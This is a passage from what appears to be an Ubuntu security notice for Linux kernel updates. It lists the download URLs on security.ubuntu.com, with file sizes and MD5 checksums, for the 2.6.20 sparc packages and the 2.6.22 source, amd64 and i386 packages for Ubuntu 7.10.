b24e851d4751aafd89f96b6b6d945831\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb\n      Size/MD5:   779240 cea2091e22942245018cce0d0a93328d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_sparc.deb\n      Size/MD5:  8122088 5c0b0af602cca54f67d8e7edf84837d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb\n      Size/MD5: 16955662 769a2e70467b4d46f7ec22bf132e2bc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb\n      Size/MD5: 16601018 1d0f0ce0673f9ed315b65e28d859a84e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb\n      Size/MD5:  2263822 b29af8e3f27ca93e0b4cb186c69b9215\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb\n      Size/MD5:  2177986 e0e3f4e033e7e5b6146a093bc7cbf50a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_sparc.deb\n      Size/MD5:   699974 3a1483cdf38fbb3b2e1ae5f227dfcc47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   264340 9b68fe2b43a61fcb59f70795bbb58b9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   156576 fa6d2dc5d481dd4799417062ed18034e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   241208 3ff9a7c4e6fe2c8374fb22fb423506ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:  1110516 163e2c4fabab3ac148aee6b2256facb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:  1571854 1916d97e91e11ff7e9e15fd595a98e53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   180416 3bf9c029d540091c5d64ac0e44d143be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   310078 e18dfca33751f59e7c6fcce65e097264\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    39664 cf204a862e9b29704e0b7841b7ca164c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    37986 fb9b30aa30f85d6d2619e9356521095f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:     8646 7b952e82af185fe035a36231080954d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    59418 4bc0b24e2fe6443614a21cf0f96bbeea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    90814 2960211b4dcbaa9a9c2d9a16cce38039\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   322562 9348c6750b654afd796a800975bcfb24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   882354 d09d76538393c1717abe6e537ff82e41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:     9826 7a4c831d26fee041c618176e2ebd2dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:   290222 46b0b52258fbd1afc668965c7bb54d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb\n      Size/MD5:    54802 2bb011cc6d5cb65777c0c5a025697631\n\nUpdated packages for Ubuntu 7.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.diff.gz\n      Size/MD5:  3536108 c528a2740969db364c6eb9b1a77d688e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.dsc\n      Size/MD5:     2262 c0868ac81f385b4eaefe240e95af4182\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz\n      Size/MD5: 56913972 c98e1329975a8a7931ae63bafe39b63a\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-14.51_all.deb\n      Size/MD5:  4614486 3dfca0830ac21485b06c713f9581b92d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14_2.6.22-14.51_all.deb\n      Size/MD5:  7776710 b8e3b1d8a257bc7ade3612f005334237\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-14.51_all.deb\n      Size/MD5:    47680 8f4e80e38c3cf8604c94a0d501e3fda2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51_all.deb\n      Size/MD5: 45356762 e1a4381f09d8941168055c58b55e2313\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    24800 4b070d4f5051b1c9245614d0d9641698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   216562 0a62364e601fc0a53d08f881d4197ccb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    49174 a29794f062daf20bda78a44efb6cb98f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    40024 fd53998535d067dc8261603189863d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    51752 43c80f4d55e74e0ead5bdfc35fd023d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    87890 caaa3c7dba61b91e35c339441909bc3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    35852 e2575f1b4b1f7af947ea12c81e574006\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   652076 30e06001b28779257732f54bac3ec053\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   205932 a642190fbf3cb18950a2b19c64567bd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    55590 8c44f25182307a028bb83e3363171c18\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    60506 4b4b57b322e32f3ad7fac716d18e2204\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   146242 088880b3a46ed49e21b5bc99e2d93b3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   285920 bd0bfd07786de2e95dd8bd4d1a489405\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:  1947028 b60b2a3b0e16fac8d41c993f46068333\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.51_amd64.deb\n      Size/MD5:   594312 fba5ad73b589a1f795f2707ac5996087\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.51_amd64.deb\n      Size/MD5:  1164464 29f65e8274a7e42f51400507dcce93cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.51_amd64.deb\n      Size/MD5:   594410 4588c5c616507c82cafb1f7c3afe4021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.51_amd64.deb\n      Size/MD5:   948792 f1c110a5fee8f16757d86a42d84a2bf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.51_amd64.deb\n      Size/MD5: 17538638 a1bec9ca0bd6780fcdf144e8102195c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.51_amd64.deb\n      Size/MD5: 17587828 0c920b926e733cd573b541e94b33d0f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.51_amd64.deb\n      Size/MD5: 18737098 c2393e7bbed20193e5bdd8a437cfd1a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.51_amd64.deb\n      Size/MD5: 19043692 2b81e14bbe0e215ae470cb68b53b528f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_amd64.deb\n      Size/MD5:   653044 f2ffb4e26b49d83d77973c5513923486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   252190 af43643d5e55ad157d59acac8b9fcfd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   150730 c9b4fe602c5c74a9872b97e80e393306\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   236430 3f7e69bbbc0439ce0c8ace0776d76d9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:  1449310 f1413d797cca50acf923c9321717175e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   142744 b577baec84a991f5bb19ed99a96e6a5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   148672 31ed14dab8a7882eaf266e6c23102f0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    86002 36552357b3626a5e41e5315c9db1e552\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    35446 e7967a4ce9a56ae8d4aa03ffcb8f99b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    38402 c83156d6002d212a7ba2b6f38538f280\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    70048 249976464365562fcd8b2deeaa7e8902\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    21462 d58aba0bf639fffd05db08dd99e23d02\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:     8658 8d99a69f86ee190ca68dbda25c2642d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    56410 c81d42b84b14abd50733dc1c967d9ead\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    88010 9d69d54dbe2b7f17ed85bae9afd26640\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:  1101108 7147bc6ad64b2d39e2fe9a16cb7ccd69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    45214 6637dfe38516fd5f0c6f60be3e6cc30a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    12670 b13c06397b45eb7f79391cf10f1689bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:   462904 b5d5d3295473b3ec05bd64dd0f1a3ff4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb\n      Size/MD5:    71790 b2836f79949af5bbb749c685edf6a7f4\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-rt_2.6.22-14.51_amd64.deb\n      Size/MD5: 17587176 7bd4cf0c2675841676688cd01fc28ffa\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-xen_2.6.22-14.51_amd64.deb\n      Size/MD5: 17358694 803cf226e915f1f1ce48d7504e940232\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    20418 53e5d8c1f0e832c5079d0c6efcab8e0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    23226 91590ee17ef99e21e5d45dfd8ff44be1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   211434 d6e77c9900d010df159b2b2d4a620161\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   213082 8b1e3c6cb6d8e8c36802d75b07b6478b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    89008 b0cdc0774416b8227c923087d80a4973\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    35748 2fe95402bc48efa05d8aa0b8e6604565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    50006 0a1c7ba4ecb91febeacf0bbd1ada74c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    50134 fe0c20d0b84f531a5bddee2e3262fc88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    37952 236aca8c70fd12a4d62d80818ec75bd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    38588 d4d9c838f6f5d44ac48c9a627f4a6352\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    44946 59310f9123fad5ccff7a4e3347455335\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    45206 d5d905d65e2c4230bcf16382cd7d2730\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    85340 670d3fcd4256663db0c08ba2d6422a52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    85654 1e7d5a403fcf48689122958c73c750f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    32338 0965cd3de5493e6ba18321cd8168270b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    32640 8e79d2ee4a153b1e7545f8e0f99c0522\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   640610 495f5fa87003476cef572fc0a55d9429\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   659472 6f6ca7e9ef9e92cc86fb8d13ef388537\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   206052 ac7bf42bc483f098d84397ffbc0ca10d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   209770 f047d2fbfda0663a3249b07c83c0d4c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    52654 4f4abd14607654b380b94aa71c22ccb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    53866 66cf45458b03c3f6dcb1f6c967db9167\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    55514 8943811103eb39b59f1720371185690f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    56920 142c9275ef967c7bd3949489354c4f4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   130906 bdd3b24aabb960c6435a9417a3ae6cec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   137788 553fc826e407152724a02ba5048ade90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   277856 11941502e0a8c925702386c0a2e5a3f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   276380 a2add0ce1f56b39d0b7d6eb58e61808e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:  1835490 599b129d3daf7e7f3f7be5075a053ff2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:  1905126 daae9ba37831c800423c7dcd13f4c4ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-386_2.6.22-14.51_i386.deb\n      Size/MD5:   578882 24a31a9f5f01f869b4611e947bd74f6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.51_i386.deb\n      Size/MD5:   580740 fd1f84197d199899d34806269920eccf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.51_i386.deb\n      Size/MD5:  1154268 bce734fa93ae5174c8065f3202ab0f69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.51_i386.deb\n      Size/MD5:   580702 9f3a91ea7a97db5fc4faf78d3f878a32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-ume_2.6.22-14.51_i386.deb\n      Size/MD5:   527310 9a03729da1b71acea8d17748019b88e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-virtual_2.6.22-14.51_i386.deb\n      Size/MD5:   466258 d833a511f6c27acb496a2abd3a243675\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.51_i386.deb\n      Size/MD5:   922980 cc5d9b6124ba174525de8599c1571ea7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-386_2.6.22-14.51_i386.deb\n      Size/MD5: 18568364 eef104937cc36378ad0ac4ac77819d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.51_i386.deb\n      Size/MD5: 18538156 38845e23c75926512ecf29e45b125a03\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.51_i386.deb\n      Size/MD5: 18626184 5ea47ce06e02a323ec8d8cb9135e01fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-virtual_2.6.22-14.51_i386.deb\n      Size/MD5:  6704782 200e57b778a842ea3c3c63f888400655\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-386_2.6.22-14.51_i386.deb\n      Size/MD5: 23474838 a86eafe344d4f981c4e08eb9249dcecb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.51_i386.deb\n      Size/MD5: 24120812 9ccfc6bea645f49dd48b2b38f7272f1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.51_i386.deb\n      Size/MD5: 24386378 0102ae0994de4f33dcb7afc0b02c616c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-virtual_2.6.22-14.51_i386.deb\n      Size/MD5: 22807844 18c0a69e4acfe85eb908358cbd6d8fd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_i386.deb\n      Size/MD5:   653030 9b6e42af1ceaeee35c1fa31a607d3fc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   247880 e4a4de1a68766600ded5152bf70b593f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   254842 113c52bea5f42adaedac6994fa453ab8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   137048 7b6e45b35926745932ae7ae941bf9fd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   137394 1c9a99502e85bd143052702bb09e74f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   221032 1096dd9fbe13b0128d08a494e98dd930\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   228396 1dee5a5e72e93b800d134a35954b1969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:  1626980 29f48fd5f0dea0fa27709e0597e5f638\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:  1647384 8ff14a7f59622a5e045a81e61d08cea3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   150418 22c6bce9eb4501a6df8b358cd4f51386\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   142512 57837900c7c270dbed779476a0519c1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   141108 39eb94420824b70bd4810cbb64a38457\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   142488 9d124b46eba0693cea9271f2dfd8ab91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    79280 9a8358f2d607e9bc258844dc25b36f43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    80914 347b32520f79c37ad2ae15ca01f461c9\n    